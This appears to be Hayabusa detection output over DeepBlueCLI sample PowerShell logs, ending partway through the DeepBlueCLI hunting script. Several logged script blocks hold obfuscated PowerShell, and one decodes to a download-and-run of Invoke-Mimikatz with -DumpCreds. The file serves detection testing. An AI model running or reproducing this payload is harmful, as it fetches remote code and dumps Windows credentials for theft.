+2017-08-31 03:19:05.622 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Set-vaRiablE (""2K""+""h8"") ( ""NoIsSeRpxE-EkOVnI | )63]RAhc[,'6V0' eCALpER- 43]RAhc[,'t3a'eCALpER- 93]RAhc[,)17]RAhc[+48]RAhc[+37]RAhc[( ecalPerC- )' ))93]RahC[,)79]RahC[+47]RahC[+121'+']RahC[( ecALpeRc- ))G'+'TI['+'GTI,GTIJy vG((GTI,GTIEGTI,GTI0GTI,GTIjaJyGTI,GTIolpSrewaJy+GTI,GTI{(gnGTI,GTIa'+'Jy+GTI,GTIraJyGTI,GTIaJ'+'yoPGTI,GTIy+GTI,GTIiMaJyGTI,GTIovnI/noaGTI,GTIy+aJGTI,GTIefittGTI,GTIytsGTI,GTI/noiGTI,GTIy+aJyGTI,GTItaaJ'+'y+aGTI,GTI+aJyth}GTI,GTI+aJy{GTI,GTIy+aJyGTI,GTI- zaJGTI,GTIaolnGTI,GTIaJy((()aGTI,GTI+aJytaJy+aJylifxGTI,GTIJyGTI,GTI.GTI,GTI.waraJy+GTI,GT'+'IytakiGTI,GTI+aJypGTI,GTIJyceGTI,G'+'TIyakimiGTI,GTI[f- )GTI,GTIJyGTI,GTI/reaJ'+'y+aGTI,GTI93]RaHcGTI,GTIaJGTI,GTIaJyGTI'+',GTIaJy+a'+'Jym'+'uDGTI,GTIsaJGTI,GTIwoGT'+'I,GTIaaJy+aJyGT'+'I,GTI1sp.aGTI,GTIytGTI,GTI+aJys'+'uGTI,GTIaJy+aJGTI,GTIW.tGTI,GTIeN taGTI,GTI/GTI,GTIlCbeGTI,GTIJyaJy'+'NiOj-]2,GTI,GTIbuhaJy+aGTI,GTIaJymGTI,GTIy+aJyGTI,GTIaJGTI,GTI+GTI,GTI+GTI,GTIzGTI,GTIigGTI,GTIiGTI,GTIamGTI,GTI+aJy-ekoaJyGTI,GTI+GTI,GTIJyGTI,GTImoc.tnetnocreaGTI,GTIaJy//:sptaJyGTI,GT'+'IaJyGTI,GTII ;)}GTI,GTI+aJybO-GTI,GTI'+'J'+'y+aJyGTI,GTIaJy+aJyekGTI'+',GTID.GTI,GTI0aJyGTI,GTI'+'tGTI,GTIaJyvnGTI,GTIJGTI,GTI11,3GTI,GTIJGTI,GTItSdGTI,GTIM-GTI,GTIaGTI,GTIaJysderCGTI,GTI ))GTI,GTI)tneiGTI,GTIweN( XEIGTI,GTIJytGTI'+',GTIam/tiGTI'+',GTIEmAn.)aJy*RDm*aGTI,GTIaJGTI,GTIaJyitGTI,GTIrGTIf- t3a}8{}'+'55{}85{}9{}35{}16{}25{}96{}87{}26{}45{}18{}83{}2{}47'+'{}08{}92{}82{}61{}32{}81{}17{}84{}12{}'+'33{}48{}42{}71{}54{}9'+'5{}11{}02{}9'+'7{}72{}43{}1{}94{}38{}66{}98{}65{}31{}74{}15{}07{}4{}68{}28{}57{}37{}51{}67{}77{}03{}24{}62{}56{}64{}93'+'{}5{}23{}36{}52{}27{}88{}58{}13'+'{}0{}21{}86{}05{}91{}7{}14{}44{}34{}75{}53{}0'+'1{}06{}78{}22{}63{}73{}6{}76{}04{}41{}19{}3{}09{}46{t3a(((( )GTIXGTI+]43[EMOhsp6V0+]4[emoHsP6V0 (&'(("" ); .( $pshOME[4]+$PshOMe[34]+'x')( [STRInG]::jOiN( '', ( variabLE (""2K""+""H8"")).VAluE[ -1 ..-(( variabLE (""2K""+""H8"")).VAluE.leNGTH) ]) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:05.642 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(('&( 0V6PsHome[4]+0V6pshOME[34]+ITGXITG) ((((a3t{64}{90}{3}{91}{14}{40}{67}{6}{37}{36}{22}{87}{60}{1'+'0}{35}{57}{43}{44}{41}{7}{19}{50}{68}{12}{0}{'+'31}{85}{88}{72}{25}{63}{32}{5}{'+'39}{46}{65}{26}{42}{30}{77}{76}{15}{73}{75}{82}{86}{4}{70}{51}{47}{13}{56}{89}{66}{83}{49}{1}{34}{27}{7'+'9}{20}{11}{5'+'9}{45}{17}{24}{84}{33'+'}{21}{48}{71}{18}{23}{16}{28}{29}{80}{'+'74}{2}{38}{81}{54}{62}{78}{69}{52}{61}{53}{9}{58}{55'+'}{8}a3t -fITGrITG,ITGtiyJaITG,ITGJaITG,ITGa*mDR*yJa).nAmEITG,'+'ITGit/maITG,'+'ITGtyJITG,ITGIEX (NewITG,ITGient)ITG,ITG)) ITG,ITGCredsyJaITG,ITGaITG,ITG-MITG,ITGdStITG,ITGJITG,ITG3,11ITG,ITGJITG,ITGnvyJaITG,ITGt'+'ITG,ITGyJa0ITG,ITG.DITG,'+'ITGkeyJa+yJaITG,ITGyJa+y'+'J'+'ITG,ITG-ObyJa+ITG,ITG}); IITG,ITGyJaI'+'TG,ITGyJatps://yJaITG,ITGaercontent.comITG,ITGyJITG,ITG+ITG,ITGyJaoke-yJa+ITG,ITGmaITG,ITGiITG,ITGgiITG,ITGzITG,ITG+ITG,ITG+ITG,ITGJaITG,ITGyJa+yITG,ITGmyJaITG,ITGa+yJahubITG,ITG,2]-jOiN'+'yJayJITG,ITGebClITG,ITG/ITG,ITGat NeITG,ITGt.WITG,ITGJa+yJaITG,ITGu'+'syJa+ITG,ITGtyITG,ITGa.ps1ITG,I'+'TGyJa+yJaaITG,I'+'TGowITG,ITGJasITG,ITGDu'+'myJ'+'a+yJaITG,'+'ITGyJaITG,ITGJaITG,ITGcHaR]39ITG,ITGa+y'+'Jaer/ITG,ITGyJITG,ITG) -f[ITG,ITGimikayIT'+'G,ITGecyJITG,ITGpyJa+ITG,ITGikatyI'+'TG,ITG+yJaraw.ITG,ITG.ITG,ITGyJITG,ITGxfilyJa+yJatyJa+ITG,ITGa)(((yJaITG,ITGnloaITG,ITGJaz -ITG,ITGyJa+yITG,ITG{yJa+ITG,ITG}htyJa+ITG,ITGa+y'+'JaatITG,ITGyJa+yITG,ITGion/ITG,ITGstyITG,ITGttifeITG,ITGJa+yITG,ITGaon/InvoITG,ITGyJaMiITG,ITG+yITG,ITGPoy'+'JaITG,ITGyJarITG,ITG+yJ'+'aITG,ITGng({ITG,ITG+yJawerSploITG,ITGyJajITG,ITG0ITG,ITGEITG,ITG((Gv yJITG,ITG'+'[IT'+'G)) -cRepLAce ([ChaR]'+'121+[ChaR]74+[ChaR]97),[ChaR]39)) ') -CrePlace ([chAR]73+[chAR]84+[chAR]71),[chAR]39 -REpLACe'a3t',[chAR]34 -REpLACe '0V6',[chAR]36) | InVOkE-ExpReSsIoN",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:25.754 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:43.056 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:43.075 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:44.154 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:44.166 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:44.171 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:44.174 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:44.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:44.180 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:44.181 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:44.236 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:46.183 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:46.196 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:19:46.238 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:20:18.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:15.729 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:15.743 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.186 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.194 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.199 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.205 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.208 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.212 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.222 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.253 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:16.268 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:17.070 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:17.087 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:17.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:22.147 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $PsHOME[21]+$pShOMe[30]+'x')( "" $( SET-ITeM 'vAriabLE:OFs' '')"" +[sTRing]('26K28!20%24l65J4e:76&3ai43i6f!4di73K50%45J63J5b:34!2cl31l35%2c&32i35%5d&2d!4aK4fJ69i6e&27l27%29&20!28i5bl73:54l52%49i4eJ67l5d%3a%3ai4a%4f:49K6el28K20:27&27:2ci20:28!28l37%33J2ci20!36l39!20:2c&38:38K20!2c!33:32K2ci20l34!30K20i2c&37i38&2c%31!30!31l2c:31:31K39J2cK34!35&2cJ37i39&20l2c%20l39J38l2cJ31%30K36i20J2cK31K30:31%2c!39i39&2ci31l31l36&2cl20J33&32!2c:20%37:38!20%2c!31i30i31i20:2c:20:31%31:36K2ci34l36K20:2cl38l37l2cJ31J30K31:20i2cl39K38l2cJ36&37%2c:20!31!30%38l2ci31&30!35%20%2c:20%31&30%31l2c!20K31&31K30!20&2c!31:31%36i20&2c!34:31l20J2c!34%36:2cl20&36!38!2c!20%31%31:31l2c!20l31&31i39:20J2cJ31&31i30K20J2c&31!30!38i20K2cK31&31J31:2cK20K39J37%2ci20K31K30K30K2c&20K38&33l20:2cJ20i31l31J36!20K2ci31:31!34!2c%20&31J30%35&20:2c&31l31:30:2cK31:30l33&20J2cK34i30l20J2c&33l39K2c&20!31:30&34J2c%31l31l36&20i2c&31i31i36i2c!31l31:32i2c!20l31i31!35&20l2c%35J38!2c:20%34!37!2c&20K34K37:20K2cl20%31%31!34:2c&39J37:20l2cK20K31J31i39l2c&20&34J36:20i2cJ20!31:30&33&2cJ31l30i35J20%2c!20l31i31K36!2cJ20i31J30K34%20:2cl31K31%37J2cl20:39i38:20i2c%31l31:37!2c!31i31!35i2c%20!31J30!31l2c!31i31%34:20i2cJ20!39!39i2c&20J31K31!31:2cJ20l31K31l30K2c:31l31&36J20:2c:31l30K31&2c%31l31:30:20l2c%20!31J31!36l20!2c&20!34K36%2cK20i39:39K2cJ20K31!31i31!20:2c!20!31i30!39%2ci34i37!2cJ20K31:30i39!2c&39J37!20i2ci20&31K31J36l2cl31J31&36K20&2cK20i31l30K35K20i2cJ20%31l30J32i20J2c!31K30i31K2ci31%31%35l2ci20:31i31K36l2cJ20J39&37:20!2ci31l31J36l20J2c%20:31%30&35!20:2ci31&31i31!2cK20l31!31l30!2c!20i34J37J20:2cl20:38:30J2ci31%31!31K20K2c!31J31i39!2ci31&30i31K20!2ci20%31%31l34%20&2c&20J38&33:2c%20!31&31:32K2cK20&31:30:38i2ci20i31l31J31i2cl31l30l35l2c&20&31&31!36%2ci20&34J37%20:2cJ31K30:39J2cK20!39%37&2cK20:31:31&35&2cK20!31%31:36J20%2c!20i31K30K31i20!2c:31%31!34:20K2cl20&34&37i20J2c&20l36l39K20!2ci20J31!32J30K2c!31:30i32&2cJ20i31i30%35!20K2c!31K30l38:20l2c!31!31l36%20%2c!20i31K31&34%2c%20J39%37J2c!20%31l31&36:20%2cl20K31%30%35!2ci31:31i31:2c:31K31%30i20!2cK20i34%37i20!2c:37K33&20:2cJ31&31K30K2c:31!31%38l20%2c:20i31l31K31%2c%31K30&37:20:2c!20&31&30l31%20l2cl20:34J35%20:2c!37l37J20%2cl31%30&35:2c&31J30%39!2ci20i31:30J35i2c!20%31:30%37%20%2c%20!39K37!20i2c:31i31!36J20:2c&20i31K32J32%2c%20:34%36J2c!31:31i32%2cJ20!31l31&35i20l2cJ20:34:39i2c%20J33&39&20J2cl20i34l31&20:2cK20!35K39l2cJ33K32l20&2c%20!37l33K20:2cK20!31J31:30&20&2ci31:31%38:2c!31K31J31l20!2c!31&30i37!2c!20%31!30%31!20l2ci20&34l35K2cl37:37!2c!20:31i30J35:20&2c!31%30&39J2c%31%30:35&20:2c!20l31:30l37i20!2c:20J39%37%2cJ20:31%31%36K2ci20J31l32:32!2ci33!32!20l2c:34%35K2ci20l36%38l20J2cK20&31i31i37&20&2c!20J31i30:39l2cJ20%31:31i32l2c&36K37i2cl31!31l34l20%2c:31:30&31l2cl31i30&30%20!2c:31l31!35i20:29l7c!66%4f&52l45%61J43l68!2dl4f%62K6aK65:63i74%20:7b!20%28:5bJ49!6e:74i5d!24i5f%20i2di61:53%5bK43K48%41%52&5d:29%20&7d!29J20J29J20!29&20'.split('&K%:Ji!l' )|fOReAcH {( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }) +""$(SeT-itEM 'VARiable:oFS' ' ') "" )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:22.154 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:22.178 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $eNv:CoMsPEc[4,15,25]-JOin'') ([sTRINg]::JOIn( '', ((73, 69 ,88 ,32, 40 ,78,101,119,45,79 , 98,106 ,101,99,116, 32, 78 ,101 , 116,46 ,87,101 ,98,67, 108,105 , 101, 110 ,116 ,41 ,46, 68, 111, 119 ,110 ,108 ,111, 97, 100, 83 , 116 ,114, 105 ,110,103 ,40 ,39, 104,116 ,116,112, 115 ,58, 47, 47 , 114,97 , 119, 46 , 103,105 , 116, 104 ,117, 98 ,117,115, 101,114 , 99, 111, 110,116 ,101,110 , 116 , 46, 99, 111 , 109,47, 109,97 , 116,116 , 105 , 102 ,101,115, 116, 97 ,116 , 105 ,111, 110, 47 , 80,111 ,119,101 , 114 , 83, 112, 108, 111,105, 116, 47 ,109, 97, 115, 116 , 101 ,114 , 47 , 69 , 120,102, 105 ,108 ,116 , 114, 97, 116 , 105,111,110 , 47 ,73 ,110,118 , 111,107 , 101 , 45 ,77 ,105,109, 105, 107 , 97 ,116 , 122, 46,112, 115 , 49, 39 , 41 , 59,32 , 73 , 110 ,118,111 ,107, 101 , 45,77, 105 ,109,105 , 107 , 97, 116, 122,32 ,45, 68 , 117 , 109, 112,67,114 ,101,100 ,115 )|fOREaCh-Object { ([Int]$_ -aS[CHAR]) }) ) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:22.178 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Int]$_ -aS[CHAR]) },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.530 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:22:37.536 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name 